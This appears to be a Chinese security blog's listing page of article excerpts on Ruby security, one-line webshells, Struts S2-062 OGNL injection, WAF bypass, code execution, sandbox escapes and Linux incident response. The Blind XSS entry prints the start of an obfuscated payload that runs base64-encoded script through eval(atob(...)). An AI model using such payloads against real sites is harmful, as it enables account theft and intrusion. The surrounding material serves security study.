V-lab实验室随着Ruby越来越流行,Ruby相关的安全问题也逐渐暴露,目前,国内专门介绍Ruby安全的文章较少,本文结合笔者所了解的Ruby安全知识点以及挖掘到的Ruby相关漏洞进行描述,希望能给...
08月28日34 views评论eval
反序列化
Ruby安全漫谈
08月28日34 views评论eval
反序列化
08月28日34 views评论eval
反序列化
Web安全-一句话木马总结
概述在很多的渗透过程中,渗透人员会上传一句话木马(简称Webshell)到目前web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢?先来看看最简...
07月30日548 views评论asp
php
S2-062漏洞原理分析
S2-062漏洞形成的原因是struts在处理标签的name属性时,将用户输入当作表达式进行二次解释,导致OGNL表达式注入。 和S2-061/S2-059类似,不过S2-061和S2-05...
07月27日210 views评论id
string
渗透干货|史上最全一句话木马
目录PHP 普通一句话 PHP系列 过狗一句话 PHP过狗 几个变性的php--过防火墙 phpv9 高版本拿shellASP asp 一句话 ASP过安全狗一句话 ASPX系列 aspx一句话JSP...
07月25日251 views评论asp
php
实战|记一次iis+aspx环境下利用http参数污染绕过waf
环境介绍Server: Microsoft-IIS/10.0X-AspNet-Version: 4.0.waf:某不知名waf漏洞点情况新建模板处,可以直接写入内容到文件:但是一写入正常的aspx语句...
07月18日54 views评论response
waf
URLMon应用实践(5):阒寂无声,网页暗链的自动化识别
0 系 统 概 况 &nb...
07月11日54 views评论javascript
攻击者
代码执行和命令执行
代码执行代码执行:未严格过滤用户输入的参数,导致用户可以通过传参在web服务器上执行恶意代码.可变函数:一个变量名后面如果有圆括号,php将寻找与变量值同名的函数并尝试执行.evaleval:将一个字...
07月06日101 views评论payload
代码执行
干货|史上最全一句话木马
一句话木马目录PHP 普通一句话 PHP系列 过狗一句话 PHP过狗 几个变性的php--过防火墙 phpv9 高版本拿shellASP asp 一句话 ASP过安全狗一句话 ASPX系列 aspx一...
07月02日39 views干货|史上最全一句话木马已关闭评论asp
get
Python在线编程导致命令执行(二)
之前的案例 《某Python学习网站在线编码导致命令执行》 漏洞修复后再次绕过的两种方法。测试仍以黑名单形式过滤关键字。且只过滤用户输入,并未影响到运行时。思路:这种过滤使用混淆(字符拼接、编码等)即...
06月26日74 views评论import
python
史上最全一句话木马
目录PHP 普通一句话 PHP系列 过狗一句话 PHP过狗 几个变性的php--过防火墙 phpv9 高版本拿shellASP asp 一句话 ASP过安全狗一句话 ASPX系列 aspx一句话JSP...
06月22日安全文章340 views评论asp
php
Blind XSS
Payload:"><input onfocus=eval(atob(http://this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCg...
06月07日20 views评论http
xss
Linux 应急响应
一. 账户安全 /etc/passwd /etc/shadow 格式:用户名:密码:用户ID:组ID:用户说明:家(home)目录:登陆之后shell 注意:无密码只允许本机登陆,远程不允许ssh登陆...
05月23日15 views评论linux
shell
16